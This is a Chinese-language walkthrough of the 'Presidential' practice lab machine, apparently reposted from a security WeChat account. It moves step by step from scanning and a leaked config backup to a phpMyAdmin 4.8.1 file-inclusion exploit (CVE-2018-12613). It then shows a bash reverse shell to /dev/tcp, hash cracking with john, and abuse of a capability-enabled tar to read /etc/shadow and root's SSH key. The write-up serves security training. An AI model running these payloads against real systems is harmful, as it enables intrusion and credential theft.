内容简介:
主机发现
端口扫描
信息收集
备份文件
子域名爆破
密码爆破
本地文件包含
Capabilities
本地权限漏洞
SSH公钥认证
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.144.218
nmap -p80,2082 -sV -sC 192.168.144.218
打开web页面
http://192.168.144.218/index.html
发现需要绑定域名
192.168.144.218 votenow.local
1.4 路径爬取
dirsearch -u http://192.168.144.218
发现网址里面的信息如下
view-source:http://votenow.local/config.php.bak
$dbUser = "votebox";
$dbPass = "casoj3FFASPsbyoRP";
$dbHost = "localhost";
$dbname = "votebox";
1.5 子域名爆破
gobuster vhost -u http://votenow.local/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt | grep "Status: 200"
发现子域名 datasafe.votenow.local
绑定子域名 :
192.168.144.218 datasafe.votenow.local
http://datasafe.votenow.local/
利用刚才发现的账号密码登录phpmyadmin
$dbUser = "votebox";
$dbPass = "casoj3FFASPsbyoRP";
登录进入
在user表下发现账号密码
账号 |
密码 |
admin |
$2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i |
http://datasafe.votenow.local/README
查看phpmyadmin版本信息
发现4.8.1版本存在文件包含漏洞
cp /usr/share/exploitdb/exploits/php/webapps/44928.txt .
# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
# Date: 2018-06-21
# Exploit Author: VulnSpy
# Vendor Homepage: http://www.phpmyadmin.net
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
# Version: 4.8.0, 4.8.1
# Tested on: php7 mysql5
# CVE : CVE-2018-12613
1. Run SQL Query : select '<?php phpinfo();exit;?>'
2. Include the session file :
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
成功!!
找到session
i2n0csdmf78kkoseno75kp4jaa9stmk7
拼接网址为
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_i2n0csdmf78kkoseno75kp4jaa9stmk7
访问该网页
文件包含成功!!
现在我们尝试反弹shell
select '<?php system("bash -i >& /dev/tcp/192.168.144.247/4444 0>&1");exit;?>'
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_seu20bv6tjd567k4ihafm3sgub4n2uq0
//注意 每次 session 刷新 都要 更新 后面的链接
反弹shell成功!
创建文件hash
cat hash
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
john --wordlist=rockyou.txt hash
su admin // 密码为 Stella
爆破出密码Stella
让我们升级一下终端
python -c "import pty;pty.spawn('/bin/bash')"
查看权限
getcap -r / 2>/dev/null
ls -l /usr/bin/newuidmap
ls -l /usr/bin/tarS
查到tarS存在权限 有可以读+搜索权限
读取shadow信息
cd //返回根目录
tarS -cvf shadow.tar /etc/shadow //打包
ls
tar -xvf shadow.tar //解压
cd etc
chmod 777 shadow
cat shadow // 读取文件
tarS -cvf k.tar /root/.ssh/id_rsa
tar -xvf k.tar
cd root/.ssh/
ssh -i id_rsa root@localhost -p 2082
成功!
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Presidential靶机
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论